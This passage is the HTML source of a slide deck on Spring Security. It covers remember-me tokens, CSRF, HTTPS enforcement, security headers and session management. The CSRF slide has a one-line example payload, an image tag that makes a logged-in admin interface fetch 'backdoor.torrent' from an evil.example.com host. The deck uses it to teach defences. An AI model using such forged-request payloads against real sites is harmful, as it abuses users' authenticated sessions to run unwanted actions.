<code class="nohighlight" data-trim data-noescape>/userProfile/*=IS_AUTHENTICATED_FULLY
/login=IS_AUTHENTICATED_ANONYMOUSLY
/logout=IS_AUTHENTICATED_ANONYMOUSLY
/lostPassword=IS_AUTHENTICATED_ANONYMOUSLY
/**=IS_AUTHENTICATED_REMEMBERED</code>
</pre>
</div>
<div>
<a href="http://localhost:8091/?message=org/springframework/security/access/vote/AuthenticatedVoter.java:29">Documentation</a>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Hash-Based Token</h1>
<pre style="display: inline-block">
<code class="nohighlight" data-trim data-noescape>base64(username + ":" + expirationTime + ":" +
md5Hex(username + ":" + expirationTime + ":" password + ":" + key))
username: As identifiable to the UserDetailsService
password: That matches the one in the retrieved UserDetails
expirationTime: The date and time when the remember-me token expires, expressed in milliseconds
key: A private key to prevent modification of the remember-me token</code>
</pre>
<h4>Disadvantages</h4>
<ul>
<li>username + expiration time known to the attacker</li>
<li>password is part of the hash</li>
<li>MD5 cipher is very fast</li>
<li>key is shared among all users</li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>Persistent Token Approach</h1>
<div style="float: left; width: 45%; font-size: 80%; margin-left: 2em;">
<h3>How it works</h3>
<ol>
<li>on successful login with Remember Me checked, a login cookie is issued</li>
<li>cookie consists of <code>series:token</code></li>
<li>the series and token are unguessable random numbers from a suitably large space</li>
<li>data is stored together with user name in a database table</li>
<li>when a non-logged-in user visits the site with a login cookie, it is looked up in the database</li>
<li>if it is present, systems logs in a user with name stored with the pair in db</li>
<li>used token is removed from the database</li>
<li>new token is generated but series part is kept same, data are updated in DB and new cookie is sent to browser</li>
<li>if the username and series are present but the token does not match, a theft is assumed - user receives a warning and all of the user's remembered sessions are deleted</li>
<li>if the username and series are not present, the login cookie is ignored.</li>
</ol>
</div>
<div style="float: left; margin-left: 2em; width: 45%; font-size: 80%;">
<h3>Disadvantages</h3>
<ul style="width: 100%">
<li>CSRF window is still open wide</li>
<li>when stolen it opens up app to the attacker</li>
<li>requires persistent storage</li>
<li>if DB is leaked attackers can login as every user using RM cookie
(<a href="http://security.stackexchange.com/questions/63435/why-use-an-authentication-token-instead-of-the-username-password-per-request/63438#63438">see this article</a>)</li>
</ul>
<h3 style="margin-top: 1em">Advantages</h3>
<ul style="width: 100%">
<li>user name is not revealed</li>
<li>password is not revealed</li>
<li>when stolen, user gets informed on next login</li>
<li>when stolen, attacker looses access on user next login</li>
</ul>
</div>
</section>
</section>
<!-- CSRF -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<h1>Cross-site request forgery</h1>
<p>Technique that misuses an authenticated relation to execute operations via HTTP calls invisible
to the user using well known URLs and parameters.</p>
<ol>
<li>user logs in to an administration</li>
<li>user opens attacker site (in the same or different tab)</li>
<li>attacker site contains IMG/SCRIPT/STYLE elements that targets administration URL
with appropriate parameters to execute actions</li>
</ol>
<pre><code><img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent"></code></pre>
<p><em>HTTP GET method is easiest to hack, other methods require social engeneering or JavaScript to execute. But are not hard to do.</em></p>
</section>
<section data-transition="fade-in fade-out">
<h1>CSRF protection</h1>
<ul>
<li>Referer header check (not entirely recommended)</li>
<li>requesting unique CSRF token in HTTP request (as parameter or header, not cookie!)</li>
</ul>
<p><em style="font-size: 75%">Originally Spring Security used <a href="https://spring.io/blog/2013/08/21/spring-security-3-2-0-rc1-highlights-csrf-protection/">CSRF token per request</a>
but it was quite impractical (browser back button, partial update) and thus CSRF token is now unique to session.</em></p>
<h3>Things to consider</h3>
<ul>
<li>CSRF protection needs to be part of login & logout process</li>
<li>Javascript / AJAX calls might copy contents <code>X-XSRF-TOKEN</code> to HTTP header (attacker won't be able to do this due to <em>same origin policy</em>) ... see
<a href="http://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/csrf.html#csrf-cookie">CookieCsrfTokenRepository</a></li>
<li>Multipart form posts are harder to protect - entire body must be processed before CSRF protection might apply</li>
<li>CSRF token SHOULD NOT be used in GET requests due to possible token leak via Referer header. CSRF token should be used only in HTTP POST actions that produces protected side effect.</li>
<li>Beware of <a href="https://www.fg.cz/cs/deje-se/prolomeni-sifrovaneho-protokolu-https-10930">Breach & Heist attack</a></li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>CSRF protection</h1>
<h2>Ultimate solution</h2>
<p>New W3C proposal <a href="https://github.com/mikewest/internetdrafts/tree/master/first-party-cookies">First-Party-Only-Cookies</a> suggests <strong>SameSite</strong> cookie
that could bring an and to CSRF attack entirely.</p>
<div style="float: left; width: 65%; font-size: 80%; margin-left: 2em;">
<iframe src="http://caniuse.com/#feat=same-site-cookie-attribute" frameborder="0" width="100%" height="450px"></iframe>
</div>
<div style="float: left; margin-left: 2em; width: 25%; font-size: 80%;">
<p>Targeted for all types of authentication cookies.</p>
<h3>Two posible modes</h3>
<ul>
<li><strong>LAX</strong><br/>allows to use authentication cookies in top level navigations</li>
<li><strong>STRICT</strong><br/>authentication cookies won't be send at all when request is initiatied from another site</li>
</ul>
</div>
</section>
</section>
<!-- CHANNEL SECURITY -->
<section data-background="img/backgrounds/brown.jpg">
<h1>Channel security</h1>
<img class="plain" src="img/spring-security/ssl.png" alt="Password" style="width: 25%; float: left">
<div style="text-align: left; float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<p>Allows you setup simple rules for SSL / plain HTTP protocol enforcement.</p>
<pre style="display: inline-block;"><code class="xml" data-trim><http>
<intercept-url pattern="/secure/**" requires-channel="https"></intercept-url>
<intercept-url pattern="/css/**" requires-channel="http"></intercept-url>
<intercept-url pattern="/**" requires-channel="any"></intercept-url>
<port-mappings>
<port-mapping http="9080" https="9443"></port-mapping>
</port-mappings>
</http></code></pre>
<div style="text-align: center">
<p>You don't have any excuse not to encrypt.</p>
<a href="https://letsencrypt.org/">
<img class="plain" src="img/spring-security/lets-encrypt.png" alt="Let's Encrypt" style="width: 50%">
</a>
</div>
</div>
</section>
<!-- SECURITY HEADERS -->
<section data-background="img/spring-security/security_header.jpg" data-background-color="black" data-background-size="30%" data-background-position="left">
<section data-transition="fade-in fade-out">
<h1>Security headers</h1>
<div style="text-align: left; margin-left: 8em;">
<p>These are defaults:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block</code></pre>
<p>By only declaring:</p>
<pre style="display: inline-block;"><code class="xml" data-trim><http>
<headers defaults-disable="false"></headers>
</http></code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>X-Content-Type-Options</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-Content-Type-Options: nosniff</code></pre>
<p>Tells browsers (Chrome,IE) not to guess content type of the document from it's content.</p>
<p>Attack scenario: malicious user uploads PDF file that contains JavaScript. Your server
let other users to download such file and open it in their browser. Even if server supplies
PDF content type, browser might decide not to trust it and detect content type by the contents of the
file. Finally it handles PDF file as JavaScript one and executes the script.</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>HTTP Strict Transport Security (HSTS)</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Strict-Transport-Security: max-age=31536000 ; includeSubDomains</code></pre>
<p>Tells browser that all resources on this domain must be reached by HTTPS protocol.</p>
<p>Except first request all subsequent ones will be loaded over HTTPS by the browser. Even if there is explicit link with HTTP protocol.</p>
<pre style="display: inline-block;"><code class="xml" data-trim><img src="http://myserver.cz/img/someimage.jpg"></code></pre>
<p>First request problem can be solved with <a href="https://hstspreload.appspot.com/">HSTS Preload</a></p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>HTTP Public Key Pinning (HPKP)</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Public-Key-Pins-Report-Only: max-age=5184000;
pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM=";
pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=";
report-uri="http://example.net/pkp-report";
includeSubDomains</code></pre>
<p>Tells browser that public key in the server certificate must match any of presented SHA256 hashes. Protects you against compromised CA.</p>
<p>Trust on First Use.</p>
<p>When using <code style="font-size: 80%">Public-Key-Pins</code> and the server delivers an unknown public key, the client should present a warning to the user.</p>
<p>Reports can be processed with <a href="https://report-uri.io/">Report URI service</a></p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>X-Frame-Options</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-Frame-Options: deny</code></pre>
<p>Tells browser not to load any FRAMES on your domain (or only frames targeting your/some domain).</p>
<p>Standardized as part of Content Security Policy.</p>
<p>Alternative variants:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-Frame-Options: deny
X-Frame-Options: sameorigin
X-Frame-Options: allow-from www.seznam.cz</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>X-XSS-Protection</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-XSS-Protection: 1; mode=block</code></pre>
<p>Ask browser to assist you with reflected XSS attack.</p>
<p>If browser <a href="https://blogs.msdn.microsoft.com/ie/2008/07/02/ie8-security-part-iv-the-xss-filter/">detects suspicious script</a> in request that is reflected in the server response, script is blocked or reported.</p>
<p>Alternative variant:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-XSS-Protection: 1; report=https://report-uri.io/</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Content Security Policy (CSP)</h1>
<div style="text-align: left; margin-left: 8em; height: 800px;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Content-Security-Policy: script-src 'self' https://trustedscripts.example.com;
report-uri /csp-report-endpoint/</code></pre>
<p>Site tels browser from which sources it expects to load resources.</p>
<p>Documentation at <a href="https://content-security-policy.com/">https://content-security-policy.com</a></p>
<p>Alternative variant:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Content-Security-Policy-Report-Only: script-src 'self';
report-uri /csp-report-endpoint/</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Content Security Policy (CSP)</h1>
<div style="text-align: left; margin-left: 8em; height: 800px;">
<img src="img/spring-security/csp.png" alt="CSP overview">
</div>
</section>
</section>
<!-- SESSION MANAGMENT -->
<section data-background="img/backgrounds/binary-code.jpg">
<section data-transition="fade-in fade-out">
<h1>Session management</h1>
<p>After successfull authentication all registered
<a href="http://localhost:8091/?message=org/springframework/security/web/authentication/session/SessionAuthenticationStrategy.java">SessionAuthenticationStrategy</a>
are called.<br/>Preprogrammed implementations provide:
</p>
<ul>
<li>session fixation protection</li>
<li>concurrency control</li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>Session fixation protection</h1>
<p><strong>Attack vector:</strong> Attacker will create it's own session in the application.
Via social engineering sends link to a user (or uses similar technique) that will make user
browser to use already existing attacker session. When user logs in, attacker can act on
behalf of the user.
</p>
<h3>Defense</h3>
<div style="float: left; width: 45%; font-size: 80%; margin-left: 2em;">
<p>Don't accept session id from URL by configuring web.xml:</p>
<pre style="display: inline-block;"><code class="xml" data-trim><session-config>
<tracking-mode>COOKIE</tracking-mode>
</session-config></code></pre>
<ul style="font-size: 70%">
<li>COOKIE</li>
<li>URL</li>
<li>
<a href="http://download.oracle.com/otn-pub/jcp/servlet-3.0-fr-eval-oth-JSpec/servlet-3_0-final-spec.pdf?AuthParam=1471606619_c6d486d96c4d3110d045d7027578a40e">SSL</a> (chapter 7.1.2)</li>
</ul>
</div>
<div style="float: left; width: 47%; font-size: 80%; margin-left: 2em;">
<p>Create new session on user login:</p>
<pre style="display: inline-block;"><code class="xml" data-trim><session-management session-fixation-protection="migrateSession"/></code></pre>
<ul style="font-size: 70%">
<li>newSession (clean)</li>
<li>migrateSession (copy)</li>
<li>changeSessionId (Servlet 3.1)</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Concurrency control</h1>
<p>Spring Security can track all sessions in <a href="http://localhost:8091/?message=org/springframework/security/core/session/SessionRegistry.java">SessionRegistry</a>.</p>
<pre style="display: inline-block;"><code class="xml" data-trim><session-management>
<concurrency-control max-sessions="1" error-if-maximum-exceeded="true" expired-url="/sessionExpired.html"/>
</session-management></code></pre>
<p>When <em>error-if-maximum-exceeded</em> is false and <em>max-sessions</em> is exceeded least recently used session is invalidated.
User using this session will get <em>expired-url</em> page.</p>
</section>
</section>
<!-- OUTRO AGAIN -->
<section data-background="img/backgrounds/black.jpg">
<img src="img/backgrounds/attention.jpg" width="800"/>
<h2>Thank your for your attention</h2>
<p>Contact me at <a href="https://www.twitter.com/novoj">@Novoj</a> or <a href="mailto:[email protected]">[email protected]</a></p>
</section>
</div>
<!-- REFERENCE: http://stackoverflow.com/questions/549/the-definitive-guide-to-form-based-website-authentication -->
</div>